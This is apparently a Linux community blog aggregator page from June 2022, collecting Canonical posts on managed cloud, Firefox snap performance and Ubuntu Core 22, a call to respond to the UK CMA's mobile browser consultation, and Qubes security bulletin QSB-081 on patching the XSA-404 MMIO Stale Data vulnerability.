It usually falls under one of these areas or their derivatives, and it’s all about the ROI. The promise of the cloud transformation was to contribute to most of these areas, if not all. Simply by cutting down infrastructure and operational costs and providing a rapid time-to-market for organisations to get their workloads live.

However, this was not the case for many who pursued the cloud, whether it was the private or public cloud. Running your IT on the long term and at scale is expensive on the public cloud. Yet, the day-2 operations of the private cloud creates unavoidable friction. Adding up to this, there are many approaches to building and setting up your cloud. Should it be a bare-metal cloud, a Kubernetes or a virtualized cloud? Should you run it in the public cloud, on-premises or in a co-located facility? Which technologies or vendor products should you use in every layer of your stack? There are literally endless possibilities of how you can create a best of breed cloud. So, how can we build a successful cloud transformation strategy? 

How has the public cloud changed the game? 

As the public cloud emerged, organisations started migrating their workloads to the public cloud to reduce their TCO. Public cloud service providers have created an alternative pathway for organisations to offload the hassle of managing underlying infrastructure, and allowing them to focus more on their applications. Due to simplicity, fractional consumption and pay-as-you-consume pricing model, the public cloud also enabled the birth of many startups and small businesses and allowed them to compete with larger organisations. It has created space for innovation with minimum constraints. Before the public cloud, a business would have to build a data centre to host their services, costing them hundreds of thousands of dollars just for their IT. That was a massive overhead and a high risk for many in their very early stages. With the development of the public cloud, we have seen many startups were empowered to compete with global enterprises, disrupting many industries and impacting our everyday lives. So let’s take a closer look at what public cloud providers offer compared to private clouds.

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://ubuntu.com/wp-content/uploads/92ab/Iaas-Paas-SaaS-table.png" width="720" /> </noscript>

In an on-premise environment, the organisation is responsible for the whole stack, starting with networking, storage and servers moving all the way to the application layer. In the public cloud, if your organisation uses IaaS, you take care of the OS and above. All the underlying infrastructure are basically dependencies that the cloud provider will manage for you. If you’re using a PaaS, they will also take care of the OS, middleware and runtime of your environment. With SaaS, you’re basically an end user of an application where the cloud provider manages everything for you.

This is something that you all probably know, but I want to dig deeper into what falls under whom’s responsibility. In cases where you wish your organisation has the most control over the cloud, virtualisation, servers, storage and networking are still managed by your cloud provider. This tells us that infrastructure has been commoditized by hyperscalers, and managing them does not uniquely provide your business with a competitive edge that impacts your organisation. Offloading these services will help you focus more on your strategic layers and become more innovative.

Moving towards a data centre as a service

The rule of thumb is: today’s technology becomes tomorrow’s commodity. Accordingly, the less unique your building blocks are, the easier it is to operate and evolve them in the future. Take PCs, for example, there is nothing unique about them today. Any piece of hardware will have a layer of OS on top that will dictate how this hardware should function, and anyone with basic computer skills should be able to use them. Data centres should be designed in the exact same way, in fact, this is how they evolved with time. In the last several years, we can see how most data centre and cloud solution vendors are commoditising their hardware and focusing on software to create the layer of intelligence that differentiates their solutions.

In short, managing the dependencies of your business applications does not add value to your organisation nor does it enrich your competitive edge in the market. However, digitising your operations, enabling remote work or heavily focusing on R&D can contribute to your competitive advantage. Frankly, 96% of executives are unhappy about innovation according to a recent McKinsey report. The findings are not surprising given that most IT specialists are more focused on keeping the lights on. This has become one of the main drivers why many organisations are moving towards managed private clouds. They want to cut down operational costs and gain more control over their budgets to be able to shift focus towards innovation. Keeping in mind that the ultimate goal behind open source is to enable flexibility and agility and cut down costs, avoiding its complexity is a huge gain for the organisation.

Thinking about simplifying your operations? 

Download the guide “Managed IT Services: Overcoming CIOs biggest challenges”
Read the “Private cloud vs managed cloud: cost analysis” whitepaper
Visit our managed services website to learn more

17 June, 2022 01:47PM

Stuart Langridge: Help the CMA help the Web

As has been mentioned here before the UK regulator, the Competition and Markets Authority, are conducting an investigation into mobile phone software ecosystems, and they recently published the results of that investigation in the mobile ecosystems market study. They’re also focusing in on two particular areas of concern: competition among mobile browsers, and in cloud gaming services. This is from their consultation document:

Mobile browsers are a key gateway for users and online content providers to access and distribute content and services over the internet. Both Apple and Google have very high shares of supply in mobile browsers, and their positions in mobile browser engines are even stronger. Our market study found the competitive constraints faced by Apple and Google from other mobile browsers and browser engines, as well as from desktop browsers and native apps, to be weak, and that there are significant barriers to competition. One of the key barriers to competition in mobile browser engines appears to be Apple’s requirement that other browsers on its iOS operating system use Apple’s WebKit browser engine. In addition, web compatibility limits browser engine competition on devices that use the Android operating system (where Google allows browser engine choice). These barriers also constitute a barrier to competition in mobile browsers, as they limit the extent of differentiation between browsers (given the importance of browser engines to browser functionality).

They go on to suggest things they could potentially do about it:

A non-exhaustive list of potential remedies that a market investigation could consider includes:
  • removing Apple’s restrictions on competing browser engines on iOS devices;
  • mandating access to certain functionality for browsers (including supporting web apps);
  • requiring Apple and Google to provide equal access to functionality through APIs for rival browsers;
  • requirements that make it more straightforward for users to change the default browser within their device settings;
  • choice screens to overcome the distortive effects of pre-installation; and
  • requiring Apple to remove its App Store restrictions on cloud gaming services.

But, importantly, they want to know what you think. I’ve now been part of direct and detailed discussions with the CMA a couple of times as part of OWA, and I’m pretty impressed with them as a group; they’re engaged and interested in the issues here, and knowledgeable. We’re not having to educate them in what the web is. The UK’s potential digital future is not all good (and some of the UK’s digital future looks like it could be rather bad indeed!) but the CMA’s work is a bright spot, and it’s important that we support the smart people in tech government, lest we get the other sort.

So, please, take a little time to write down what you think about all this. The CMA are governmental: they have plenty of access to windy bloviations about the philosophy of tech, or speculation about what might happen from “influencers”. What’s important, what they need, is real comments from real people actually affected by all this stuff in some way, either positively or negatively. Tell they whether you think they’ve got it right or wrong; what you think the remedies should be; which problems you’ve run into and how they affected your projects or your business. Earlier in this process we put out calls for people to send in their thoughts and many of you responded, and that was really helpful! We can do more this time, when it’s about browsers and the Web directly, I hope.

If you feel as I do then you may find OWA’s response to the CMA’s interim report to be useful reading, and also the whole OWA twitter thread on this, but the most important thing is that you send in your thoughts in your own words. Maybe what you think is that everything is great as it is! It’s still worth speaking up. It is only a good thing if the CMA have more views from actual people on this, regardless of what those views are. These actions that the CMA could take here could make a big difference to how competition on the Web proceeds, and I imagine everyone who builds for the web has thoughts on what they want to happen there. Also there will be thoughts on what the web should be from quite a few people who use the web, which is to say: everybody. And everybody should put their thoughts in.

So here’s the quick guide:

  1. You only have until July 22nd
  2. Read Mobile browsers and cloud gaming from the CMA
  3. Decide for yourself:
    • How these issues have personally affected you or your business
    • How you think changes could affect the industry and consumers
    • What interventions you think are necessary
  4. Email your response to browsersandcloud@cma.gov.uk

Go to it. You have a month. It’s a nice sunny day in the UK… why not read the report over lunchtime and then have a think?

17 June, 2022 10:33AM

hackergotchi for Qubes

Qubes

XSAs released on 2022-06-14

The Xen Project has released one or more Xen Security Advisories (XSAs). The security of Qubes OS is affected. Therefore, user action is required.

XSAs that affect the security of Qubes OS (user action required)

The following XSAs do affect the security of Qubes OS:

  • XSA-404

Please see QSB-081 for the actions users must take in order to protect themselves, as well as further details about these XSAs:

https://www.qubes-os.org/news/2022/06/17/qsb-081/

XSAs that do not affect the security of Qubes OS (no user action required)

The following XSAs do not affect the security of Qubes OS, and no user action is necessary:

  • (none)

17 June, 2022 12:00AM

QSB-081: x86: MMIO Stale Data vulnerabilities (XSA-404)

We have just published Qubes Security Bulletin (QSB) 081: x86: MMIO Stale Data vulnerabilities (XSA-404). The text of this QSB is reproduced below. This QSB and its accompanying signatures will always be available in the Qubes Security Pack (qubes-secpack).

View QSB-081 in the qubes-secpack:

https://github.com/QubesOS/qubes-secpack/blob/master/QSBs/qsb-081-2022.txt

In addition, you may wish to:


             ---===[ Qubes Security Bulletin 081 ]===---

                             2022-06-17

            x86: MMIO Stale Data vulnerabilities (XSA-404)


User action required
---------------------

Users with appropriate hardware (see the "affected hardware" section
below) must install the following specific packages in order to address
the issues discussed in this bulletin:

  For Qubes 4.0, in dom0:
  - Xen packages, version 4.8.5-41

  For Qubes 4.1, in dom0:
  - Xen packages, version 4.14.5-3

These packages will migrate from the security-testing repository to the
current (stable) repository over the next two weeks after being tested
by the community. [1] Once available, the packages are to be installed
via the Qubes Update tool or its command-line equivalents. [2]

Dom0 must be restarted afterward in order for the updates to take
effect.

If you use Anti Evil Maid, you will need to reseal your secret
passphrase to new PCR values, as PCR18+19 will change due to the new
Xen binaries.


Summary
--------

On 2022-06-14, the Xen Project published XSA-404, "x86: MMIO Stale
Data vulnerabilities" [3]:

| This issue is related to the SRBDS, TAA and MDS vulnerabilities.
| Please see:
| 
|   https://xenbits.xen.org/xsa/advisory-320.html (SRBDS)
|   https://xenbits.xen.org/xsa/advisory-305.html (TAA)
|   https://xenbits.xen.org/xsa/advisory-297.html (MDS)
| 
| Please see Intel's whitepaper:
| 
|   https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/processor-mmio-stale-data-vulnerabilities.html


Impact
-------

An adversary who controls a VM with an assigned PCI device can infer
the memory content of other guests or Xen itself. This could allow the
adversary to read information that should be accessible only to Xen or
another VM and to use that information to launch further attacks. In
the default Qubes OS configuration, only sys-net and sys-usb can be
used to perform this attack.


Affected hardware
------------------

All Intel systems are affected. While mitigations are available, they
are available only for some Intel CPU models. Normally, it should be a
simple matter to look up a given CPU model number in a table to see
whether it is affected and whether it is eligible for any mitigations.
Indeed, Intel has published a table [4] that claims to serve this
purpose. Unfortunately, however, we have found several inaccuracies in
this table. Since we cannot rely on the table, we have had to devise an
alternative method using other published Intel technical documents that
appear to be more accurate. This has turned out to be quite complex.

Our best evidence indicates that mitigations are available for all and
only those CPUs that are both eligible for and updated with the Intel
microcode update released in May 2022. [5] Since going through all the
complicated technical steps of checking this manually would be
excessively cumbersome for most users, we have written a tool that does
it for you. Please note that this tool is entirely optional and is *not*
required for any security updates to take effect. Rather, its intended
purpose is to satisfy the curiosity of users who wish to know whether
their own CPUs are eligible for mitigations and who would struggle to
make that determination manually. This tool is included in the
`qubes-core-dom0-linux-4.0.35` package for Qubes 4.0 and the
`qubes-core-dom0-linux-4.1.23` package for Qubes 4.1. These packages
will migrate from the security-testing repository to the current
(stable) repository over the next two weeks after being tested by the
community. [1] Once available, the packages are to be installed via the
Qubes Update tool or its command-line equivalents. [2]

After installing the required updates, you will be able to execute `sudo
cpu-microcode-info` in a dom0 terminal. This will output a table of
information about the logical CPUs (aka CPU "cores") in your system. The
"F-M-S/PI" column lists the "Family-Model-Stepping/Platform ID" codes
that Intel uses in its microcode documentation, [5] which is explained
in further detail in Intel's README. [6] (The manual process of checking
would involve extracting your CPU information, converting it to
hexadecimal, and looking it up in the appropriate table in this
document.) The "Loaded microcode version" column lists the microcode
versions currently loaded for each CPU. The "20220510 update available"
column lists whether the required May 2022 microcode update is
*available* for each CPU. The "20220510 update installed" column lists
whether the required May 2022 microcode update is *installed* in each
CPU.

In order for the updates associated with this bulletin to successfully
mitigate XSA-404, a value of "yes" is required in both of these last two
"20220510 update" columns. If the "available" column has a "yes" while
the "installed" column has a "no," then the May 2022 microcode update
must be installed first. If both columns have "no" values, then this CPU
remains vulnerable, and there is no known mitigation available. If your
system has such a CPU, then installing The Xen packages listed in the
"user action required" section above is *not* expected to mitigate the
problem described in this bulletin. Unfortunately, there is simply
nothing we can do for these CPUs in terms of patching unless we receive
a fix from Intel or receive new information about which CPUs are
affected. Nonetheless, we still recommend installing the updates anyway
(once available), since they will not make the problem any worse,
keeping up-to-date with all security updates is a general best practice,
and future updates will be based on the latest version.

However, hope is not entirely lost for users whose CPUs are not eligible
for software mitigations. Since the vulnerability discussed in this
bulletin does not affect VMs without PCI passthrough devices, users
still have the option of altering their habits to treat VMs like sys-usb
and sys-net as more trusted. While this can be especially challenging in
the case of sys-net, it at least affords users *some* latitude in
working around the problem by being mindful of when such VMs are
running, how trusted their templates are, and similar considerations.


Further plans regarding PCI passthrough
----------------------------------------

This is yet another issue affecting only VMs with access to PCI devices.
This pattern of vulnerabilities has prompted us to research more secure
ways of handling such VMs in future Qubes releases. Eventually, we plan
to treat them as more privileged VMs that require additional protection.
Specific protective measures will be discussed with the community as
part of our ongoing research and development efforts.


Credits
--------

See the original Xen Security Advisory.


References
-----------

[1] https://www.qubes-os.org/doc/testing/
[2] https://www.qubes-os.org/doc/how-to-update/
[3] https://xenbits.xen.org/xsa/advisory-404.html
[4] https://www.intel.com/content/www/us/en/developer/topic-technology/software-security-guidance/processors-affected-consolidated-product-cpu-model.html
[5] https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files/blob/main/releasenote.md#microcode-20220510
[6] https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files#about-processor-signature-family-model-stepping-and-platform-id


--
The Qubes Security Team
https://www.qubes-os.org/security/

17 June, 2022 12:00AM

June 16, 2022

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Blog: Operator Day at Kubecon EU 2022 – recordings available!

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh4.googleusercontent.com/jHRct_DdFCDoXS-0jWP5MLSxlrnTOEdRnsvE9hJI7pdN4GdNG65LAAGgnvLhsWAw5SUK3UPJquwREcGPWBBmMT2g9HRJtbcHtvSYwHsgDhVoJ9IgYRFnvMXmyCq07YKBUVGimc-eU5wfcdkNPQ" width="720" /> </noscript>

The Operator Day at Kubecon EU 2022, hosted by Canonical, took place on Monday 16 May  2022. We thank everyone for attending the event. Our thanks go out especially to those who engaged with us via chat during the online event. We enjoyed answering questions and having conversations during the presentations.  If you missed Operator Day, we have good news. The recordings are now available:

Opening PlenaryMark Shuttleworth
CEO of Canonical

David Booth
VP Cloud Native Applications

A common substrate for enabling solutions
Alex Jones
Engineering Director

Juju & Charmed
Ecosystem Update
Jon Seager
VP, Enterprise Solutions

30 mins to stand up a simple appDaniela Plascencia
Charm Engineering

Observability for developers of Charmed Operators
Simon Aronsson
Charm Engineering

Testing framework for Juju Charmed OperatorsMarc Oppenheimer
Charm Engineering

Publishing Charmed Operators and their Ecosystem
Michael Jaeger
Product Manager


Pedro Leão Da Cruz
Product Lead


Building a sophisticated product on Juju
Rob Gibbon
Product Manager

Experts Panel Discussion: Outlook to Kubernetes and cloud native operations
Mark Shuttleworth
CEO of Canonical

David Booth
VP Cloud Native Applications

Ken Sipe
Co-Chair Operator Framework, CNCF

Michael Hausenblas
Solution Engineering Lead, AWS

Steve George
Chief Operations Officer at Weaveworks

Tim Hockin
Principal Software Engineer, Google Cloud

Operator Day 2021

Curious about previous Operator Day editions? Check out keynotes and announcements from last year:

Operator Day at Kubecon NA 2021Announcement / Watch Keynote
Operator Day at Kubecon EU 2021Announcement / Watch Keynote

Want to learn more about software operators? 

If you missed Operator Day or want to learn more about software operators, join our upcoming webinar. We will cover the advantages of software operators and introduce you to the Juju Charmed Operator Framework, Canonical’s implementation of the software operator pattern. We will also discuss how to go ahead with delivering software operators for metal, cloud and Kubernetes.

Last but not least, check out these links to develop charmed operators:

16 June, 2022 04:55PM

Ubuntu Blog: How are we improving Firefox Snap performance? Part 2

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh4.googleusercontent.com/thSM33DrZC68Wk9uFaSJPJOKrUOs_nTPkp26lgorNX3kKzWh48GzmiCaxmE8s6newbCAbGsZUJhW1csARAbiLMezbZllCFITCND_P7jvHk-3NRELkCo5erY0yL_9DkFeVw_i3hf0r7b4emO69A" width="720" /> </noscript>
Photo by John Anvik, Unsplash

Welcome to Part 2 of our investigation into Firefox snap performance. To minimise duplication we recommend checking out Part 1 of this series. There you’ll find a summary of our approach, glossary of terms, and tips on standardised benchmarking.

Welcome back, Firefox fans! It’s time for another update on our Firefox snap improvements.

The Firefox snap offers a number of benefits to daily users of Ubuntu as well as a range of other Linux distributions. It improves security, delivers cross-release compatibility and shortens the time for improvements from Mozilla to get into the hands of users.

Currently, this approach has trade-offs when it comes to performance, most notably in Firefox’s first launch after a system reboot. This series tracks our progress in improving startup times to ensure we are delivering the best user experience possible.

Along the way we’ll also be addressing specific use-case issues that have been identified with the help of the community.

Let’s take a look at what’s we’ve been up to!

Current areas of focus

Here we cover recent fixes, newly identified areas of interest and an update on our profiling investigations.

Jupyter Notebook support – FIXED

Follow the issue

For a number of data scientists, Jupyter Notebook support in the browser is critical to their workflow. When launching a notebook there are two ways to view it:

  • Opening a file at ~/.local/share/jupyter/…
  • Navigating to an http://localhost/ URL

The second route is more compliant with sandboxed environments and has no issues in the Firefox snap. However, the default recommendation is to open the file directly. This caused problems since .local isn’t accessible to confined snaps, which limit access to dot directories by default.

We have merged a snapd workaround giving the browser interface access specifically to ~/.local/share/jupyter to enable the default workflow. We also reported the issue upstream and suggested changing the help text to point to the http://localhost/ URL first as the recommended user journey.

Software rendering

Follow the issue

Last time, we talked about the Firefox snap failing to determine which GPU driver it should use. In this circumstance it falls back to software rendering on devices like the Raspberry Pi, which significantly impacts performance. To address this we’ve updated the snapd OpenGL interface to allow access to more PCI IDs, including the ones used on the Rasberry Pi.

However, this fix doesn’t seem to fully address the issue. There are still reports of acceleration being blocked by the platform. Resolving this has the potential to make a large difference on Raspberry Pi so we are continuing to investigate.

Extension handling

Follow the issue

Copying the large number of language packs during Firefox’s first start remains a consistent issue in all of our benchmarks.

Mozilla intend to mirror a change in the snap that they made on the Windows version of Firefox. This would add the ability to only load one locale at a time based on the system locale.

Native messaging support

Follow the issue

Native messaging support enables key features such as 2FA devices and GNOME extensions. The new XDG Desktop Portal has landed in Jammy but the Firefox integration continues to be iterated on. Things are progressing well and the fix should land soon.

Network Mounts

Follow the issue

The Firefox snap and flatpak are currently unable to interact with network shares. This problem has to do with the XDG Desktop Portal working in local mode. The fact that the fileselector portal is listing those mounts in the sidebar is also adding to the confusion.

Until the portal issue gets resolved, one workaround is to access the mount through /var/run/user/USERUID/gvfs (NOTE: you need gvfs-fuse installed, which creates local mount points).

Font and icon handling

New benchmarks for font and icon handling on amd64 suggest that the cache building of icons, themes and fonts is relatively minor when it comes to resource usage. Firefox spends some time doing this, whereas Chromium does not. For most systems this is around 300ms, but on Raspberry Pi the impact is much larger (up to 6-7 seconds).

Investigations show that the caching process is very I/O intensive, and I/O is a lot slower on an SD card with a Raspberry Pi 4 CPU.

This is likely a symptom of an underlying issue that we’re working to identify.

Futex() syscall time

We analyzed the behavior of the confined snap of Firefox against the unconfined version, as well as the Firefox setup confined from the tarball (available as a direct download from the Mozilla site).

With the confined version, in the strace run summaries, we noticed that the futex() system call takes about 20000us to complete on average on Kubuntu 22.04 and about 7000us on Fedora 36, both installed on identical hardware. These numbers indicate memory locking contention, especially when compared to the same results gathered from the unconfined or non-snap versions of Firefox. There, the futex() system call averages only about 20us

Furthermore, we noticed that the snap version executes far more futex() system calls (as well as others). Some of this is expected, as the execution of the snap differs from non-snap applications, including the use of base and content snaps, as well as security confinement

The problem has been reported consistently on different hardware platforms and Linux distributions, with the overall futex() system call average time correlating linearly with the observed startup time.

For instance, a sample strace summary (strace -c) of a Firefox snap run:

% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- -------------------
 82.18  388.576521       18131     21431      2272 futex
 10.31   48.737839        7583      6427         4 poll
  4.09   19.350524        7660      2526         6 epoll_wait
  1.50    7.114924       72601        98        38 wait4
  0.69    3.258415         574      5676      2715 recvmsg
  0.51    2.406544       41492        58           clock_nanosleep
  0.13    0.633050          71      8843         5 read
  0.12    0.564651          34     16452     11403 openat

And in comparison, the tar version on the same host:

% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- -------------------
 46.13    0.397783           8     47957           clock_gettime
 19.76    0.170379          21      7828      1245 futex
  6.90    0.059470           8      6888           gettimeofday
  5.22    0.044991           8      5353      4324 recvmsg
  3.49    0.030111           8      3745           poll
  2.57    0.022125       22125         1           wait4
  1.75    0.015092           8      1829           read
  1.68    0.014518          15       942       319 openat

We have observed similar results with other snaps, including Thunderbird as well as Chromium. While the actual startup time differs from snap to snap, the overall behavior is consistent, and underlines an excess of computation with snap binaries

We tried to isolate the source of this phenomenon in different ways. First, we tried to understand whether the security confinement may be the cause of whatever contention in memory management would cause Firefox (and other binaries) to experience userspace locking issues. This would then translate into the excess of futex() system calls and their subsequently very high time per call. Disabling the AppArmor and Seccomp confinement did not yield any improvements.

Likewise, we compiled Firefox with its internal sandboxing disabled, as well as compiled the browser with the use of tmalloc (to understand if there may be other reasons for memory contention), but these attempts also did not yield any startup time improvements

We’re continuing to explore this issue with further strace and memory checks against a non-confined snapd version.

Keep in touch

That’s all for this week’s update! Look out for Part 3 in the next few weeks. In the meantime don’t forget to keep an eye on our key aggregators of issues and feedback:

If you want to take benchmarks and track improvements on your own machine, don’t forget to read our section ‘Create your own benchmarks’ in Part 1 of this series and share them on our Discourse topic.

16 June, 2022 09:59AM

June 15, 2022

hackergotchi for Purism PureOS

Purism PureOS

Upgrading Qubes 4.0.4 to 4.1.0

For those running Qubes 4.0.4 looking to upgrade to 4.1.0, let’s review the upgrade process using a Librem 14. To get started, you’ll need a USB hard drive to store your backup and a USB flash drive to boot the upgrade ISO. Preparing your backup drive Most file system formats will work as long as […]

The post Upgrading Qubes 4.0.4 to 4.1.0 appeared first on Purism.

15 June, 2022 11:47PM by David Hamner

hackergotchi for Ubuntu developers

Ubuntu developers

Bryan Quigley: Dev Ops job?

Dev Ops Job?

Are you looking for a remote (US, Canada, or Phila) Dev Ops job with a company focused on making a positive impact?

15 June, 2022 04:00PM

Ubuntu Blog: Master IoT software updates with validation sets on Ubuntu Core 22

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://ubuntu.com/wp-content/uploads/7cf2/Copie-a-Growth-engineering-team-1.png" width="720" /> </noscript>
Save your seat for an intro webinar

If you are packaging your IoT applications as snaps or containers, you are aware of the benefits of bundling an application with its dependencies. Publishing snaps across different operating system versions and even distributions is much easier than maintaining package dependencies. Automated IoT software updates make managing fleets of devices more efficient. While you can avoid the dependency hell between software packages, how could you ensure that the diverse applications on an IoT device work well together?

Ubuntu Core 22 introduces the feature of validation sets that makes IoT device management easier. A validation set is a secure policy (assertion) that is signed by your brand and distributed by your dedicated Snap Store. With validation sets you can specify which snaps are required, permitted or forbidden to be installed together on a device. Optionally, specific snap revisions can be set too.

Applying a validation set

An IoT gateway device, for example, will often run various applications that come from different teams or vendors. This software can be released and updated at different intervals.  Moreover, how applications interface with each other can change in ways that are unpredictable. Even loosely coupled applications need to be tested to observe how well they perform together.

With validation sets, you can describe verified combinations of software. It is your decision if you want such a policy to be optional and monitored when needed or enforced by snapd. When enforcing a validation set, snapd will ensure that:

  • Snaps required by a validation set are both present and, if specified, at the correct revision. Attempting to remove a required snap will result in an error and the process will be rejected.
  • Snaps are only refreshed to newer revisions if they continue to satisfy the applied validation sets.
  • Invalid snaps are not allowed to be installed. Attempting to install them will result in an error.

By enforcing validation sets you can ensure that your devices maintain testing and certification integrity over time and across software changes.

Fine control for your IoT software updates

With effective use of validation sets, you can orchestrate how IoT software updates are performed to your fleet of devices. Even if applications are released and updated at different times, changes to installed software will be kept consistent according to the validation set policy. Application updates in Ubuntu Core are automatic and distributed through the Snap Store. By default, the snapd daemon checks for updates multiple times per day. Each update check is called a refresh. Validation sets provide an elegant alternative to refresh control or using the Snapd REST API to control the conditions under which software updates are performed on a device. Just like updating snaps, rolling out policy updates to your devices can happen automatically through your dedicated Snap Store. This makes managing large scale deployments easier and verifiable.

Learn more

Be sure to read the validation sets and validation-set assertion documentation for more information on how to use this feature with your dedicated Snap Store. This new feature is still under active development. Questions and feedback are always appreciated in the Snapcraft.io forum. If you want to learn more about using snaps, the Snapcraft docs are also a good place to start.

Stay tuned

Watch the Ubuntu Core 22 webinar on June 28th, 2022 at 4:00PM CET.

Curious how your existing project or exciting new idea can benefit from the new features of Ubuntu Core 22, get in touch with us.


15 June, 2022 02:38PM

Ubuntu Blog: What you’re missing out if you don’t try Ubuntu Core 22

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://ubuntu.com/wp-content/uploads/2f75/Ubuntu-Core-22-blog-post-2.png" width="720" /> </noscript>
Read the official announcement here

Ubuntu Core is the operating system for IoT and edge

Ubuntu Core, the Ubuntu flavour optimised for IoT and edge devices, has a new version available. With a 2-year release cadence, every new release is both an exciting and challenging milestone.

Ubuntu Core is based on Ubuntu. It is open source, long-term supported (LTS), binary compatible and offers a unified developer experience. It allows developers and makers to build composable and software-defined appliances built from immutable snap container images. The goal is to offer developers a new development experience, getting away from complex cross-compilation frameworks and intricate system layers Application development is the focus with simple tools that can be used across all Ubuntu flavours.

Ubuntu Core 22 is fully containarised and secure

Its fully containerised architecture offers a new embedded operating system paradigm which is inherently reliable and secure. Applications are completely isolated from each other and the system, creating systems that are extremely robust and fault-tolerant. It has been designed for devices with constrained resources, and optimised for size, reliability, performance and security.

Security is a major concern for unattended and connected devices, so security features have been carefully designed to offer peace of mind to the most paranoid of IT managers. 

  • With Full disk encryption, Ubuntu Core ensures data and system integrity, encrypting the partition using digital signatures that are stored in hardware TPM.
  • Secure Boot protects against vulnerabilities at boot time, verifying system integrity with a hardware root of trust.

With 4 releases behind, Ubuntu Core is a mature embedded operating system. It has been widely adopted by both enterprises and the community, as it successfully solves many of the key challenges IoT and edge devices makers must face. Ubuntu Core 22 sits on the base of those strengths, offering new features that increase the scope of usability.

What the Ubuntu Core 22 video

Why you should be excited about UC22

There are many features that should make you feel excited about the new Ubuntu Core 22 release. Discover the most relevant ones in the following sections or check the full list of features:

Migration and backward compatibility

One of the key properties of Ubuntu Core 22 (UC22) is that it maintains the same partition layout as Ubuntu Core 20 (UC20). This is really important, as it provides a path to upgrade UC20 systems to UC22 and backward compatibility of the new features to UC20.

LTS alignment

Ubuntu Core 22 is based on Ubuntu 22.04 LTS; the release has been deliberately aligned with that version (released on 21 April 2022). This allows Ubuntu Core 22 to be fully supported for the whole life of 22.04 LTS (until 2032).

Performance improvements

IoT and embedded devices usually have limited storage, memory and CPU resources. This is  why, with every new release of Ubuntu Core, there are always improvements in all of these areas. In Ubuntu Core 22, both footprint and memory usage have been optimised and reduced. The same is true for boot time and snap execution time.

Remodelling

An Ubuntu Core image is characterised by its model assertion. This model assertion contains identification information (such as brand account id and model name), the essential system snaps (including the gadget snap, kernel snap and the boot base snap), other required or optional snaps that implement the device functionality and additional options for the defined device, such as the security grade and encryption of the image.

Remodelling is a new feature that allows changing any of the elements of the model assertion. Brand, model, IoT App Store ID or version are some of the contexts that can be changed, enabling resellers to rebrand devices. This is also a necessary feature for having a migration path between UC20 and UC22.

Validation-sets

A validation set is an assertion that lists specific snaps that are either required to be installed together or are permitted to be installed together on a device or system. It allows applications to be updated consistently and simultaneously towards well defined and predictable revisions. This increases the compatibility and consistency between applications.

Factory reset

With the factory reset feature, you can restore an Ubuntu Core device to a known pristine state, preserving essential data created during initialisation. Although it was possible to perform this action with previous Ubuntu Core versions, it was a tedious and manual task. Ubuntu Core 22 includes a factory reset boot mode, accessible from run and recovery modes.

Quota groups

A quota group sets resource limits on services inside the snaps it contains. Currently, maximum memory and CPU usage are supported as resource limits.

MAAS support

MAAS is Metal As A Service, a service that treats physical machines like virtual machine (instances) in the cloud. It provisions a full system image remotely for bare-metal hardware. Now, it is possible to deploy Ubuntu Core 22 to bare-metal devices in the field using MAAS.

Ubuntu Core 22 Webinar invitation

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://ubuntu.com/wp-content/uploads/91ba/Webinar-Intro-to-UC22-1.png" width="720" /> </noscript>
Introduction to Ubuntu Core 22

Save your seat for our first episode of our webinar series: Introduction to Ubuntu Core 22 on June 28th, 2022 at 4:00PM CET.

In this webinar, you will learn:

  • Everything you need to know about Ubuntu Core
  • What are the new and exciting features of Ubuntu Core 22
  • Why Ubuntu Core 22 is the embedded operating system chosen by many key players

Get started with UC22

Getting started with Ubuntu Core 22 is very easy and straightforward. If you use pre-certified hardware then you just need to:

  1. Select the hardware you want
  2. Select the right Ubuntu Core 22 image
  3. Flash the image
  4. Boot and configure’
<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh5.googleusercontent.com/N8lIqrpylNgd9sfP39FQF9VDT-uymv8Nhdyw5VfD7IHAtborzCT7XXibOtjlWLfggnreB4OOvYahJROY_pdp13mx36yxPIe8sL-AzVYhFtCj60V2g7FcwTnDipBdtpEJA0aXl5i4Zbm_lZG-pw" width="720" /> </noscript>

Ubuntu Core has pre-built images for many popular platforms. Explore our list of supported platforms or contact us. You can also start a project from scratch for your custom board following our simple guides.

Stay tuned

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://ubuntu.com/wp-content/uploads/76cc/2.png" width="720" /> </noscript>
Canonical at Embedded World

Join us at Embedded World to see exciting demos (June 21-23rd, 2022 in Nuremberg, Germany

Further reading

15 June, 2022 02:01PM

Ubuntu Blog: Canonical Ubuntu Core 22 is now available – optimised for IoT and embedded devices

The ultra-secure embedded Ubuntu introduces support for real-time compute in robotics and industrial applications.

15 June 2022: Canonical today announced that Ubuntu Core 22, the fully containerised Ubuntu 22.04 LTS variant optimised for IoT and edge devices, is now generally available for download from ubuntu.com/download/iot. Combined with Canonical’s technology offer, this release brings Ubuntu’s comprehensive and industry-leading operating system (OS) and services to a complete range of embedded and IoT devices.

IoT manufacturers face complex challenges to deploy devices on time and within budget. Ensuring security and remote management at scale is also taxing as device fleets expand. Ubuntu Core 22 helps manufacturers meet these challenges with an ultra-secure, resilient, and low-touch OS, backed by a growing ecosystem of silicon and ODM partners.

“Our goal at Canonical is to provide secure, reliable open source everywhere – from the development environment to the cloud, down to the edge and to devices,” said Mark Shuttleworth, CEO of Canonical. “With this release, and Ubuntu’s real-time kernel, we are ready to expand the benefits of Ubuntu Core across the entire embedded world.”

Real-time compute support

